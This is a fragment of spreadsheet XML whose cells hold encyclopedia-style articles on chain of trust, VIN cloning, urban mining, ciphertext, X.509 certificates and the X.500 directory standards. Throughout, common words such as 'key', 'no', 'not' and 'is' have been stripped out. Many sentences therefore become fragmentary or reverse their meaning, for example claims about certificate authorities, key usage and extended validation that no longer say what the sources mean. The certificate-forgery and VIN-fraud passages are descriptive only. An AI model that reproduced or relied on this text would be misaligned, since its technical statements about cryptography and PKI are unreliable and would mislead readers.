    <t>computer security, chain trust established validating component hardware software entity root certificate. intended ensure trusted software hardware used still retaining flexibility. introduction chain trust designed allow multiple users create software system, would difficult keys stored directly hardware. starts hardware boot software digitally signed. signing authority sign boot programs enforce security, running programs signed, allowing signed code access certain features machine. this process continue several layers. this process results chain trust. final software trusted certain properties, illegally modified signature would invalid, previous software would executed previous software trusted, turn, would loaded signature invalid. trustworthiness layer guaranteed before, back trust anchor. would possible hardware check suitability (signature) every single piece software. however, would produce flexibility "chain" provides. chain, given link replaced different version provide different properties, without back trust anchor. this multiple layers application general technique improve scalability, analogous multiple certificates certificate chain. computer security computer security, digital certificates verified using chain trust. trust anchor digital certificate root certificate authority (ca). certificate hierarchy structure certificates allows individuals verify validity certificate's issuer. certificates issued signed certificates reside higher certificate hierarchy, validity trustworthiness given certificate determined corresponding validity certificate signed chain trust certificate chain ordered list certificates, containing end-user subscriber certificate intermediate certificates (that represents intermediate ca), enables receiver verify sender intermediate certificates trustworthy. this process best described page intermediate certificate authority. also x.509 certificate chains description concepts widely used standard digital certificates.</t>
  </si>
  <si>
    <t>VIN cloning</t>
  </si>
  <si>
    <t>cloning cloning practice using vehicle identification number (vin) legally registered hide identity stolen salvaged vehicle. procedure involves replacing serial plate stolen salvage repaired vehicle plate containing number validly registered vehicle similar make, model year another state, province country. practice organized theft rings partially responsible creation national databases national motor vehicle title information system united states personal property securities register australia zealand.the problem cloning potentially large reporting case tampa, florida, 1,000 cloned cars sold buyers twenty states several countries, estimated losses million consumers, auto insurers, victims. purchaser cloned vehicle true pedigree discovered, confiscated, owner would still responsible outstanding loans. states united states, dealership held responsible. owner legitimately registered vehicle number belongs could potentially accused variety offenses parking tickets serious criminal activity like organized crime. victim could spend great amount time money trying prove owner cloned vehicle. practice also reported numerous countries including canada, united kingdom, australia. references</t>
  </si>
  <si>
    <t>Urban mining</t>
  </si>
  <si>
    <t>urban mine stockpile rare metals discarded waste electrical electronic equipment (weee) society. urban mining process recovering rare metals mechanical chemical treatments.the name coined 1980s professor hideo nanjyo research institute mineral dressing metallurgy tohoku university idea gained significant traction japan (and parts asia) 21st century.research published japanese government's national institute materials science 2010 estimated 6,800 tonnes gold recoverable used electronic equipment japan. references sources further reading nakamura, takashi; halada, kohmei (2014). urban mining systems. briefs applied sciences technology. springer. isbn 9784431550754.</t>
  </si>
  <si>
    <t>Ciphertext</t>
  </si>
  <si>
    <t>cryptography, ciphertext cyphertext result encryption performed plaintext using algorithm, called cipher. ciphertext also known encrypted encoded information contains form original plaintext unreadable human computer without proper cipher decrypt this process prevents loss sensitive information hacking. decryption, inverse encryption, process turning ciphertext readable plaintext. ciphertext confused codetext latter result code, cipher. conceptual underpinnings {\displaystyle m\!} plaintext message alice wants secretly transmit {\displaystyle e_{k}\!} encryption cipher, {\displaystyle _{k}\!} cryptographic key. alice must first transform plaintext ciphertext, {\displaystyle c\!} order securely send message bob, follows: {\displaystyle c=e_{k}(m).\!} symmetric-key system, knows alice's encryption key. once message encrypted, alice safely transmit (assuming else knows key). order read alice's message, must decrypt ciphertext using {\displaystyle {e_{k}}^{-1}\!} known decryption cipher, {\displaystyle d_{k}:\!} {\displaystyle d_{k}(c)=d_{k}(e_{k}(m))=m.\!} alternatively, non-symmetric system, everyone, alice bob, knows encryption key; decryption cannot inferred encryption key. only knows decryption {\displaystyle d_{k},} decryption proceeds {\displaystyle d_{k}(c)=m.} types ciphers history cryptography began thousands years ago. cryptography uses variety different types encryption. earlier algorithms performed hand substantially different modern algorithms, generally executed machine. historical ciphers historical paper ciphers used past sometimes known classical ciphers. they include: substitution cipher: units plaintext replaced ciphertext (e.g., caesar cipher one-time pad) polyalphabetic substitution cipher: substitution cipher using multiple substitution alphabets (e.g., vigenère cipher enigma machine) polygraphic substitution cipher: unit substitution sequence letters rather (e.g., playfair cipher) transposition cipher: ciphertext permutation plaintext (e.g., rail fence cipher)historical ciphers generally used standalone encryption technique quite easy crack. many classical ciphers, exception one-time pad, cracked using brute force. modern ciphers modern ciphers secure classical ciphers designed withstand wide range attacks. attacker able find used modern cipher, even knows amount plaintext corresponding ciphertext. modern encryption methods divided following categories: private-key cryptography (symmetric algorithm): used encryption decryption public-key cryptography (asymmetric algorithm): different keys used encryption decryptionin symmetric algorithm (e.g., aes), sender receiver must shared advance kept secret parties; sender uses encryption, receiver uses decryption. asymmetric algorithm (e.g., rsa), separate keys: public published enables sender perform encryption, private kept secret receiver enables perform correct decryption. symmetric ciphers divided block ciphers stream ciphers. block ciphers operate fixed-length groups bits, called blocks, unvarying transformation. stream ciphers encrypt plaintext digits time continuous stream data transformation successive digits varies encryption process. cryptanalysis cryptanalysis study methods obtaining meaning encrypted information, without access secret information normally required typically, involves knowing system works finding secret key. cryptanalysis also referred codebreaking password cracking cracking code. ciphertext generally easiest part cryptosystem obtain therefore important part cryptanalysis. depending information available type cipher analyzed, cryptanalysts follow attack models crack cipher. attack models ciphertext-only: cryptanalyst access collection ciphertexts code texts known-plaintext: attacker ciphertexts knows corresponding plaintext chosen-plaintext attack: attacker obtain ciphertexts corresponding arbitrary plaintexts choosing batch chosen-plaintext attack: cryptanalyst chooses plaintexts encrypted. this often meaning unqualified "chosen-plaintext attack". adaptive chosen-plaintext attack: cryptanalyst makes series interactive queries, choosing subsequent plaintexts based information previous encryptions. chosen-ciphertext attack: attacker obtain plaintexts corresponding arbitrary ciphertexts choosing adaptive chosen-ciphertext attack indifferent chosen-ciphertext attack related-key attack: like chosen-plaintext attack, except attacker obtain ciphertexts encrypted different keys. keys unknown, relationship known; example, keys differ bit.the ciphertext-only attack model weakest implies cryptanalyst nothing ciphertext. modern ciphers rarely fail attack. famous ciphertexts babington plot ciphers shugborough inscription zimmermann telegram magic words squeamish ossifrage cryptogram "the gold-bug" beale ciphers kryptos zodiac killer ciphers also books cryptography cryptographic hash function frequency analysis red/black concept category:undeciphered historical codes ciphers references further reading dictionary definition ciphertext wiktionary media related ciphertexts wikimedia commons helen fouché gaines, “cryptanalysis”, 1939, dover. isbn 0-486-20097-3 david kahn, codebreakers story secret writing (isbn 0-684-83130-9) (1967) abraham sinkov, elementary cryptanalysis: mathematical approach, mathematical association america, 1968. isbn 0-88385-622-0</t>
  </si>
  <si>
    <t>X.509</t>
  </si>
  <si>
    <t>cryptography, x.509 international telecommunication union (itu) standard defining format public certificates. x.509 certificates used many internet protocols, including tls/ssl, basis https, secure protocol browsing web. they also used offline applications, like electronic signatures. x.509 certificate binds identity public using digital signature. certificate contains identity hostname, organization, individual) public (rsa, dsa, ecdsa, ed25519, etc.), either signed certificate authority self-signed. when certificate signed trusted certificate authority, validated means, someone holding certificate public contains establish secure communications another party, validate documents digitally signed corresponding private key. x.509 also defines certificate revocation lists, means distribute information certificates deemed invalid signing authority, well certification path validation algorithm, allows certificates signed intermediate certificates, are, turn, signed certificates, eventually reaching trust anchor. x.509 defined international telecommunications union's "standardization sector" (itu-t), itu-t study group based asn.1, another itu-t standard. history usage x.509 initially issued july 1988, begun association x.500 standard. first tasks providing users secure access information resources avoiding cryptographic man-in-the-middle attack. assumes strict hierarchical system certificate authorities (cas) issuing certificates. this contrasts trust models, like pgp, anyone (not special cas) sign thus attest validity others' certificates. version x.509 includes flexibility support topologies like bridges meshes. used peer-to-peer, openpgp-like trust, rarely used 2004. x.500 system implemented sovereign nations state identity information sharing treaty fulfillment purposes, ietf's public-key infrastructure (x.509) (pkix) working group adapted standard flexible organization internet. fact, term x.509 certificate usually refers ietf's pkix certificate profile x.509 certificate standard, specified 5280, commonly called pkix public infrastructure (x.509).an early issue public infrastructure (pki) x.509 certificates well known "which directory" problem. problem client know fetch missing intermediate certificates global x.500 directory never materialized. problem mitigated including intermediate certificates request. example, early servers sent server's certificate client. clients lacked intermediate certificate find failed build valid path server's certificate. work around problem, servers send intermediate certificates along server's certificate.while pkix refers ietf's internet's standard, many pkis different policies. example, government policies, ca/browser forum policies. government's massive book 2500 pages. organization's diverges much ietf ca/browser forum, organization risks losing interoperability common tools like browsers, curl, wget. example, policy issuing certificates monday, common tools like curl wget enforce policy allow certificate issued tuesday. certificates x.509 certificates bind identity public using digital signature. x.509 system, types certificates. first certificate. second end-entity certificate. certificate issue certificates. level, self-signed certificate sometimes called root certificate. other certificates called intermediate subordinate certificates. end-entity certificate identifies user, like person, organization business. end-entity certificate cannot issue certificates. end-entity certificate sometimes called leaf certificate since certificates issued organization wants signed certificate requests using protocol like certificate signing request (csr), simple certificate enrollment protocol (scep) certificate management protocol (cmp). organization first generates pair, keeping private secret using sign csr. contains information identifying applicant applicant's public used verify signature distinguished name (dn) unique person, organization business. accompanied credentials proofs identity required certificate authority. validated using registration authority (ra), certification authority issue certificate binding public particular distinguished name. roles registration authority certification authority usually separate business units separation duties reduce risk fraud. organization's trusted root certificates distributed employees company system. browsers internet explorer, firefox, opera, safari chrome come predetermined root certificates pre-installed, certificates major certificate authorities work instantly; effect browsers' developers determine trusted third parties browsers' users. example, firefox provides and/or html file containing list included cas.x.509 5280 also include standards certificate revocation list (crl) implementations. another ietf-approved checking certificate's validity online certificate status protocol (ocsp). firefox enabled ocsp checking default, versions windows least vista later. structure certificate structure foreseen standards expressed formal language, abstract syntax notation (asn.1). structure x.509 digital certificate follows: certificate version number serial number signature algorithm issuer name validity period before after subject name subject public info public algorithm subject public issuer unique identifier (optional) subject unique identifier (optional) extensions (optional) certificate signature algorithm certificate signatureeach extension unique expressed object identifier (oid), values, together either critical non-critical indication. certificate-using system must reject certificate encounters critical extension recognize, critical extension contains information cannot process. non-critical extension ignored recognized, must processed recognized.the structure version given 1422. itu-t introduced issuer subject unique identifiers version permit reuse issuer subject name time. example reuse goes bankrupt name deleted country's public list. after time another name register itself, even though unrelated first one. however, ietf recommends issuer subject names reused. therefore, version widely deployed internet.extensions introduced version extensions issue certificate specific purpose (e.g. signing digital objects). versions, serial number must unique certificate issued specific mentioned 5280). extensions informing specific usage certificate 5280 (and predecessors) defines number certificate extensions indicate certificate used. most arcs joint-iso-ccitt(2) ds(5) id-ce(29) oid. some common, defined section 4.2.1, are: basic constraints, id-ce used indicate whether certificate certificate certify issue certificates. constraint marked critical. constraint marked critical, agent must fail process certificate agent understand constraint. agent continue process non-critical constraint understand. usage, id-ce provides bitmap specifying cryptographic operations performed using public contained certificate; example, could indicate used signatures encipherment. extended usage, id-ce used, typically leaf certificate, indicate purpose public contained certificate. contains list oids, indicates allowed use. example, id-pkix indicates used server connection; id-pkix indicates used secure email.in general using 5280, certificate several extensions restricting use, restrictions must satisfied given appropriate. gives specific example certificate containing keyusage extendedkeyusage: case, must processed certificate used extensions coherent specifying usage certificate. example, uses extensions specify certificate usage. extended validation certificates certification authorities operating ca/browser forum's issue certificates varying levels validation. different validations provide different levels assurances certificate represents supposed example, server validated lowest level assurances using email called domain validation (dv). server validated higher level assurances using detailed methods called extended validation (ev). practice, certificate means certificate issued domain like example.com someone responded email sent webmaster@example.com. certificate means certificate issued domain like example.com, company like example, owner domain, owner verified articles incorporation. extended validation additional security controls, secure channel setup using certificate "stronger" channel setup using different level validation like extended validation signaled certificate using x.509 extension. each uses different object identifier (oid) assert extended validation. there single indicate extended validation, complicates user agent programming. each user agent must list oids indicate extended validation. ca/browser forum's recognizes extended validation many browsers provide visual feedback user indicate site provides certificate. other pkis, like internet's (pkix), place special emphasis extended validation. tools using pkix policies, like curl wget, simply treat certificate like certificate. security expert peter gutmann states ca's created certificates restore profit levels race bottom profits. during race bottom ca's prices lure consumers purchase certificates. result, profits reduced ca's dropped level validation performing point nearly assurances certificate. certificate filename extensions there several commonly used filename extensions x.509 certificates. unfortunately, extensions also used data private keys. .pem (privacy-enhanced electronic mail) base64 encoded certificate, enclosed -----begin certificate----- -----end certificate----- .cer, .crt, .der usually binary form, base64-encoded certificates common (see .pem above) .p7b, .p7c pkcs#7 signeddata structure without data, certificate(s) crl(s) .p12 pkcs#12, contain certificate(s) (public) private keys (password protected) .pfx pfx, predecessor pkcs#12 (usually contains data pkcs#12 format, e.g., files generated iis)pkcs#7 standard signing encrypting (officially called "enveloping") data. since certificate needed verify signed data, possible include signeddata structure. .p7c file degenerated signeddata structure, without data sign.pkcs#12 evolved personal information exchange (pfx) standard used exchange public private objects single file. certificate chains cross-certification certificate chain (see equivalent concept "certification path" defined 5280 section 3.2) list certificates (usually starting end-entity certificate) followed certificates (usually last self-signed certificate), following properties: issuer certificate (except last one) matches subject next certificate list each certificate (except last one) signed secret corresponding next certificate chain (i.e. signature certificate verified using public contained following certificate) last certificate list trust anchor: certificate trust delivered trustworthy procedurecertificate chains used order check public (pk) contained target certificate (the first certificate chain) data contained effectively belongs subject. order ascertain this, signature target certificate verified using contained following certificate, whose signature verified using next certificate, last certificate chain reached. last certificate trust anchor, successfully reaching prove target certificate trusted. description preceding paragraph simplified view certification path validation process defined 5280 section involves additional checks, verifying validity dates certificates, looking crls, etc. examining certificate chains built validated, important note concrete certificate part different certificate chains (all valid). this several certificates generated subject public key, signed different private keys (from different different private keys ca). although single x.509 certificate issuer signature, validly linked certificate, building completely different certificate chains. this crucial cross-certification pkis applications. following examples: examples diagrams: each represents certificate, subject bold means signed (or, precisely, signed secret corresponding public contained b"). certificates color (that white/transparent) contain public example cross-certification root certification authority (ca) level pkis order manage user certificates existing (like "user trusted generates certificate (cert2.1) containing public ca2. "cert2 cert2.1 green) subject public key, valid chains cert2.2 (user "cert2.2 cert2" "cert2.2 cert2.1 cert1". similarly, generate certificate (cert1.1) containing public user certificates existing (like "user trusted example certificate renewal understanding certification path construction (pdf). forum. september 2002. allow graceful transition signing pair signing pair, issue certificate contains public signed private signing certificate contains public signed private signing key. both certificates self-issued, neither self-signed. note addition self-signed certificates (one old, new). since cert1 cert3 contain public (the one), valid certificate chains cert5: "cert5 cert1" "cert5 cert3 cert2", analogously cert6. this allows user certificates (such cert5) certificates (such cert6) trusted indifferently party either root certificate trust anchor transition keys. sample x.509 certificates this example decoded x.509 certificate used wikipedia.org several wikipedia websites. issued globalsign, stated issuer field. subject field describes wikipedia organization, subject alternative name (san) field describes hostnames could used. subject public info field contains ecdsa public key, signature bottom generated globalsign's private key. end-entity certificate certificate: data: version: (0x2) serial number: 03:04:54:08:f9:ff:10:92:e1:69:fe:49:8f:78:d3:6d:dc:47 signature algorithm: sha256withrsaencryption issuer: let's encrypt, validity before: 08:01:49 2021 after 08:01:48 2021 subject: *.wikipedia.org subject public info: public algorithm: id-ecpublickey public-key: (256 bit) pub: 04:a5:9a:47:b2:d3:fc:a7:df:de:f6:cb:45:62:0a: d3:c1:a7:38:de:20:bd:d7:10:7d:58:73:de:8d:a1: 99:70:0c:dd:ab:91:3f:0e:83:97:1b:4f:a2:99:f3: f8:30:73:ef:da:be:91:25:18:7a:d6:da:bf:e5:e9: 72:a3:41:31:7a asn1 oid: prime256v1 nist curve: p-256 x509v3 extensions: x509v3 usage: critical digital signature x509v3 extended usage: server authentication, client authentication x509v3 basic constraints: critical ca:false x509v3 subject identifier: 08:0e:29:26:07:e9:b4:5b:63:2d:86:5d:f6:e2:5a:8c:cd:6a:d0:a7 x509v3 authority identifier: keyid:14:2e:b3:17:b7:58:56:cb:ae:50:09:40:e6:1f:af:9d:8b:14:c2:c6 authority information access: ocsp uri:http://r3.o.lencr.org issuers uri:http://r3.i.lencr.org/ x509v3 subject alternative name: dns:*.m.mediawiki.org, dns:*.m.wikibooks.org, dns:*.m.wikidata.org, dns:*.m.wikimedia.org, dns:*.m.wikinews.org, dns:*.m.wikipedia.org, dns:*.m.wikiquote.org, dns:*.m.wikisource.org, dns:*.m.wikiversity.org, dns:*.m.wikivoyage.org, dns:*.m.wiktionary.org, dns:*.mediawiki.org, dns:*.planet.wikimedia.org, dns:*.wikibooks.org, dns:*.wikidata.org, dns:*.wikimedia.org, dns:*.wikimediafoundation.org, dns:*.wikinews.org, dns:*.wikipedia.org, dns:*.wikiquote.org, dns:*.wikisource.org, dns:*.wikiversity.org, dns:*.wikivoyage.org, dns:*.wiktionary.org, dns:*.wmfusercontent.org, dns:mediawiki.org, dns:w.wiki, dns:wikibooks.org, dns:wikidata.org, dns:wikimedia.org, dns:wikimediafoundation.org, dns:wikinews.org, dns:wikipedia.org, dns:wikiquote.org, dns:wikisource.org, dns:wikiversity.org, dns:wikivoyage.org, dns:wiktionary.org, dns:wmfusercontent.org x509v3 certificate policies: policy: 2.23.140.1.2.1 policy: 1.3.6.1.4.1.44947.1.1.1 cps: http://cps.letsencrypt.org precertificate scts: signed certificate timestamp: version (0x0) f6:5c:94:2f:d1:77:30:22:14:54:18:08:30:94:56:8e: e3:4d:13:19:33:bf:df:0c:2f:20:0b:cc:4e:f1:64:e3 timestamp 09:01:49.274 2021 extensions: none signature ecdsa-with-sha256 30:46:02:21:00:88:0f:f3:f1:bc:a3:ad:b8:7b:fd:c2: a6:6a:4b:7c:1f:35:18:7b:3f:18:f6:43:29:46:f6:c2: dd:15:63:c1:5d:02:21:00:cf:e0:1f:3d:e7:4a:37:c6: cd:e5:bc:cd:99:fe:9c:f1:f7:ea:04:2d:97:da:c2:74: a6:30:37:57:f0:32:82:73 signed certificate timestamp: version (0x0) 6f:53:76:ac:31:f0:31:19:d8:99:00:a4:51:15:ff:77: 15:1c:11:d9:02:c1:00:29:06:8d:b2:08:9a:37:d9:13 timestamp 09:01:50.105 2021 extensions: none signature ecdsa-with-sha256 30:44:02:20:37:bc:8f:6a:ba:fa:ac:0b:3b:4c:3f:c8: c2:ab:ea:3b:60:de:a8:ab:44:72:e5:43:6a:e0:0a:24: 32:49:7f:30:02:20:11:af:f7:67:43:81:07:c7:fb:b6: 89:55:0b:74:58:61:76:fb:62:ff:f4:c9:d0:c6:a7:43: 63:98:4c:f5:4c:7e signature algorithm: sha256withrsaencryption 8e:f4:d1:85:9c:96:e8:63:d0:38:fd:7a:cc:d5:ad:b2:06:b4: 4a:cf:3d:5a:b9:c2:28:3d:58:57:8a:55:42:ec:99:d3:ca:4f: ec:97:c0:10:73:77:43:5c:74:be:7e:2a:89:d8:fa:86:2f:8d: d3:57:99:67:3a:f6:28:6c:d1:26:29:ce:cf:7e:96:bd:34:0e: 86:98:b3:0b:2e:28:dc:5b:46:77:32:a7:d9:b1:e6:de:e9:9a: 2b:5d:03:f2:e0:07:12:03:d9:03:a8:ef:47:60:16:55:2a:32: 53:c9:b3:4c:54:99:e0:98:d6:5f:1a:94:1c:6c:c5:e9:13:f7: 08:c7:b6:b5:dd:d8:2b:b5:b7:2e:ba:cb:0b:2d:be:50:c6:85: 0d:22:46:5e:e6:5f:b7:d4:86:45:d8:a4:bf:80:18:6e:46:96: d1:76:93:f5:40:e2:15:18:be:e0:cb:5f:cd:d0:4f:fa:ca:76: 68:ba:94:c4:1d:1a:0e:3d:3b:ef:ed:1e:29:38:1d:22:bb:8b: 96:71:55:b7:e4:8b:31:34:ec:63:09:e9:1c:d8:2f:f8:9a:b7: 78:dc:33:c9:4e:84:85:03:0b:c5:52:af:9e:b0:6a:dc:fe:9e: 89:2f:17:40:69:74:74:65:37:38:b4:28:23:01:01:81:19:23: 23:cd:75:a0 validate end-entity certificate, needs intermediate certificate matches issuer authority identifier: connection, properly-configured server would provide intermediate part handshake. however, also possible retrieve intermediate certificate fetching issuers" end-entity certificate. intermediate certificate this example intermediate certificate belonging certificate authority. this certificate signed end-entity certificate above, signed root certificate below. note subject field intermediate certificate matches issuer field end-entity certificate signed. also, "subject identifier" field intermediate matches "authority identifier" field end-entity certificate. root certificate this example self-signed root certificate representing certificate authority. issuer subject fields same, signature validated public key. validation trust chain here. validating program root certificate trust store, end-entity certificate considered trusted connection. otherwise, end-entity certificate considered untrusted. certificate: data: version: (0x2) serial number: 04:00:00:00:00:01:15:4b:5a:c3:94 signature algorithm: sha1withrsaencryption issuer: c=be, o=globalsign nv-sa, ou=root cn=globalsign root validity before: 12:00:00 1998 after 12:00:00 2028 subject: c=be, o=globalsign nv-sa, ou=root cn=globalsign root subject public info: public algorithm: rsaencryption public-key: (2048 bit) modulus: 00:da:0e:e6:99:8d:ce:a3:e3:4f:8a:7e:fb:f1:8b: exponent: 65537 (0x10001) x509v3 extensions: x509v3 usage: critical certificate sign, sign x509v3 basic constraints: critical ca:true x509v3 subject identifier: 60:7b:66:1a:45:0d:97:ca:89:50:2f:7d:04:cd:34:a8:ff:fc:fd:4b signature algorithm: sha1withrsaencryption d6:73:e7:7c:4f:76:d0:8d:bf:ec:ba:a2:be:34:c5:28:32:b5: security there number publications problems bruce schneier, peter gutmann security experts. architectural weaknesses blocklisting invalid certificates (using crls ocsp), client trusts certificates crls available, lose offline capability makes attractive. clients trust certificates crls available, case attacker controls communication channel disable crls. adam langley google said soft-fail checks like safety belt works except accident. crls notably poor choice large sizes convoluted distribution patterns, ambiguous ocsp semantics lack historical revocation status, revocation root certificates addressed, aggregation problem: identity claims (authenticate identifier), attribute claims (submit vetted attributes), policy claims combined single container. this raises privacy, policy mapping, maintenance issues. delegation problem: cannot technically restrict subordinate issuing certificates outside limited namespaces attribute set; feature x.509 use. therefore, large number exist internet, classifying policies insurmountable task. delegation authority within organization cannot handled all, common business practice. federation problem: certificate chains result subordinate cas, bridge cas, cross-signing make validation complex expensive terms processing time. path validation semantics ambiguous. hierarchy third-party trusted party model. this inconvenient bilateral trust relationship already place. issuance extended validation (ev) certificate hostname prevent issuance lower-validation certificate valid hostname, means higher validation level protect man-in-the-middle attacks. problems certification authorities person organization purchases certificate often utilize least expensive certification authority. response, ca's prices removed expensive validation checks known race bottom. race bottom partly addressed extended validation (ev) certificates, trust value eyes security experts diminishing. according peter gutmann, certificates additional security controls. rather, certificates merely restore profits levels prior race bottom allowing charge service providing along. certification authorities attempt deny almost warranties user relying parties certification practice statement (cps). example, apple states cps, extent permitted applicable law, subscriber agreements, applicable, disclaim warranties apple, including warranty merchantability fitness particular purpose". according peter gutmann, "users undefined certification request protocol obtain certificate published unclear location nonexistent directory real means revoke like businesses, subject legal jurisdictions operate within, legally compelled compromise interests customers users. intelligence agencies also made false certificates issued extralegal compromise cas, diginotar, carry man-in-the-middle attacks. another example revocation request dutch government, dutch becoming active starting january 2018, giving powers dutch intelligence security services implementation issues implementations suffer design flaws, bugs, different interpretations standards lack interoperability different standards. some problems are: many implementations turn revocation check: seen obstacle, policies enforced turned browsers default, including code signing, would probably crash infrastructure complex little understood (lack canonicalization, internationalization problems) rfc822name notations name policy constraints hardly supported usage ignored, first certificate list used enforcement custom oids difficult attributes made critical makes clients crash unspecified length attributes lead product-specific limits there implementation errors x.509 allow e.g. falsified subject names using null-terminated strings code injection attacks certificates using illegal 0x80 padded subidentifiers object identifiers, wrong implementations using integer overflows client's browsers, attacker include unknown attribute csr, sign, client wrongly interprets "cn" (oid=2.5.4.3). kaminsky 26th chaos communication congress "black pki" cryptographic weaknesses digital signature systems depend secure cryptographic hash functions work. when public infrastructure allows hash function longer secure, attacker exploit weaknesses hash function forge certificates. specifically, attacker able produce hash collision, convince sign certificate innocuous contents, hash contents identical hash another, malicious certificate contents, created attacker values choosing. attacker append ca-provided signature malicious certificate contents, resulting malicious certificate appears signed because malicious certificate contents chosen solely attacker, different validity dates hostnames innocuous certificate. malicious certificate even contain "ca: true" field making able issue trusted certificates. md2-based certificates used long time vulnerable preimage attacks. since root certificate already self-signature, attackers could signature intermediate certificate. 2005, arjen lenstra benne weger demonstrated "how hash collisions construct x.509 certificates contain identical signatures differ public keys", achieved using collision attack hash function. 2008, alexander sotirov marc stevens presented chaos communication congress practical attack allowed create rogue certificate authority, accepted common browsers, exploiting fact rapidssl still issuing x.509 certificates based md5. april 2009 eurocrypt conference, australian researchers macquarie university presented "automatic differential path searching sha-1". researchers able deduce method increases likelihood collision several orders magnitude. february 2017, group researchers marc stevens produced sha-1 collision, demonstrating sha-1's weakness. mitigations cryptographic weaknesses exploiting hash collision forge x.509 signatures requires attacker able predict data certificate authority sign. this somewhat mitigated generating random component certificates signs, typically serial number. ca/browser forum required serial number entropy baseline requirements section since 2011.as january 2016, baseline requirements forbid issuance certificates using sha-1. early 2017, chrome firefox reject certificates sha-1. 2017 edge safari also rejecting sha-1 certificate. non-browser x.509 validators reject sha-1 certificates. standards x.509 pkcs7 (cryptographic message syntax standard public keys proof identity signed and/or encrypted message pki) transport layer security (tls) predecessor cryptographic protocols internet secure communications. online certificate status protocol (ocsp) certificate revocation list (crl) check certificate revocation status pkcs12 (personal information exchange syntax standard) used store private appropriate public certificate certification path building guidance recommendations building x.509 public-key certification paths within applications (i.e., validating end-entity certificate using certificate) pkix working group 1995, internet engineering task force conjunction national institute standards technology formed public-key infrastructure (x.509) working group. working group, concluded june 2014, commonly referred "pkix." produced rfcs standards documentation using deploying x.509 practice. particular produced 3280 successor 5280, define x.509 internet protocols. major protocols standards using x.509 certificates tls/ssl https 5280 profile x.509, s/mime (secure multipurpose internet mail extensions) eap-tls method wifi authentication. protocol uses tls, smtp, pop, imap, ldap, xmpp, many more, inherently uses x.509. ipsec 4945 profile authenticating peers. opencable security specification defines profile x.509 cable industry. devices like smart cards tpms often carry certificates identify owners. these certificates x.509 form. ws-security standard defines authentication either certificate profile. both methods x.509. microsoft authenticode code signing system uses x.509 identify authors computer programs. industrial automation communication standard uses x.509. generally uses trust first security model need certificates. however, popular openssh implementation support ca-signed identity model based non-x.509 certificate format. also abstract syntax notation certificate policy code access security communications security information security iso/iec resource query protocol public-key cryptography public infrastructure time stamp protocol trusted timestamping eddsa references external links itu-t's x.509 standards peter gutmann's articles: overview x.509 implementation notes style guide "crypto labs". laboratories. archived original december 2006. secure code guidelines 4158 internet x.509 public infrastructure: certification path building 5280 internet x.509 public infrastructure certificate certificate revocation list (crl) profile decoder certificate decoder used decode examine encoded certificate phpseclib: x.509 decoder decodes associative array whose keys correspond x.509's asn.1 description sesele, wizard self-signed certificates understanding digital certificates microsoft technet</t>
  </si>
  <si>
    <t>X.500</t>
  </si>
  <si>
    <t>x.500 series computer networking standards covering electronic directory services. x.500 series developed telecommunication standardization sector international telecommunication union (itu-t). itu-t formerly known consultative committee international telephony telegraphy (ccitt). x.500 approved first 1988. directory services developed support requirements x.400 electronic mail exchange name lookup. international organization standardization (iso) international electrotechnical commission (iec) partners developing standards, incorporating open systems interconnection suite protocols. iso/iec 9594 corresponding iso/iec identification. x.500 protocols protocols defined x.500 include: these protocols typically defined piecemeal throughout multiple specifications asn.1 modules. "defining specification" column indicates (subjectively) specification contributes specifically protocol. because protocols used networking stack, number alternatives developed allow internet clients access x.500 directory using tcp/ip networking stack. well-known alternative lightweight directory access protocol (ldap). while x.500 protocols tcp/ip networking stack, ldap remains popular directory access protocol. transport protocols x.500 protocols traditionally networking stack. however, lightweight directory access protocol (ldap) uses tcp/ip transport. later versions recommendation x.519, internet directly-mapped (idm) protocols introduced allow x.500 protocol data units (pdus) transported tcp/ip stack. this transport involves transport well simple record-based binary protocol frame protocol datagrams. x.500 data models primary concept x.500 single directory information tree (dit), hierarchical organization entries distributed across servers, called directory system agents (dsa). entry consists attributes, attribute values. each entry unique distinguished name, formed combining relative distinguished name (rdn), attributes entry itself, rdns superior entries root dit. ldap implements similar data model x.500, description data model article ldap. x.520 x.521 together provide definition attributes object classes used representing people organizations entries dit. they widely deployed white pages schema. x.509, portion standard providing authentication framework, also widely used outside x.500 directory protocols. specifies standard format public-key certificates. relationship x.500 directory x.509v3 digital certificates current x.509v3 certificates outside directory structure loaded directly browsers necessary e-commerce develop allowing secure based (ssl/tls) communications require x.500 directory source digital certificates originally conceived x.500 (1988). contrast role x.500 x.509 understand relationship x.509 designed secure access method updating x.500 www, browsers became popular needed simple method encrypting connections transport layer sites. hence trusted root certificates supported certificate authorities loaded certificate storage areas personal computer device. added security envisaged scheduled 2011-2014 implementation national strategy trusted identities cyberspace, two- three-year project protecting digital identities cyberspace.the e-commerce implementation x.509v3 bypassed replace original standard authentication mechanism binding distinguished names x.500 directory. these packages certificates added removed user software, reviewed microsoft mozilla terms continued trustworthiness. should problem arise, occurred diginotar, browser security experts issue update mark certificate authority untrusted, serious removal effectively "internet trust". x.500 offers view organization claims specific root certificate, outside provided bundle. this function corner model trust" adding another check determine root certificate compromised. rules governing federal bridge policy revoking compromised certificates available www.idmanagement.gov. contrast browser bundled approach x.500 ldap attribute "cacertificate" "bound" directory entry checked addition default pre-loaded bundle certificates users typically never noticed unless warning message appeared. example, site using ssl, typically site name "www.foobar.com" verified browser software using libraries would check certificate signed trusted root certificates given user. therefore, creating trust users reached correct site https. however, stronger checks also possible, indicate domain name verified. contrast x.500, certificate attribute many entry, entry could contain anything allowable specific directory schema. thus x.500 store digital certificate, many attributes could potentially verify organization, physical address, contact telephone number email contact. certs certificate authority certs loaded browser automatically case microsoft's update mechanism), version updates browsers, user given choices import, delete, develop individual trust relationship loaded certificate authorities determine browser behave ocsp revocation servers unreachable. this contrast directory model associates attribute cacertificate listed certificate authority. thus browser verify cert website means loaded group accepted certificates root certificates looked x.500 ldap directory http/s) imported list trusted certificate authorities. "bound" distinguished name located subject fields certificate matches directory entry. x.509v3 contain extensions depending community interest international domain names. broad internet use, rfc-5280 pkix describes profile fields useful applications encrypted email. user relies authenticity certificate presented browser email simple compare forged certificate presented (perhaps triggers browser warning) valid certificate, without also given opportunity validate distinguished name designed looked x.500 dit. certificate public considered unforgeable therefore distributed manner, associated binding identity occurs directory. binding links certificate identity claims using certificate. example, x.500 software runs federal bridge cross certificates enable trust certificate authorities. simple homographic matching domain names resulted phishing attacks domain appear legitimate, not. x.509v3 certificate bound valid organization's distinguished name within directory, simple check made regards authenticity certificate comparison presented browser present directory. some options exist check notaries certificate recently seen, therefore likely compromised. cert likely trusted failing domain name slight mismatch, initially fail browser, subjected notary trust, bypass browser warning. valid organizational entry, o=foobarwidgets, also associated alphanumeric oid, "identity proofed" ansi, 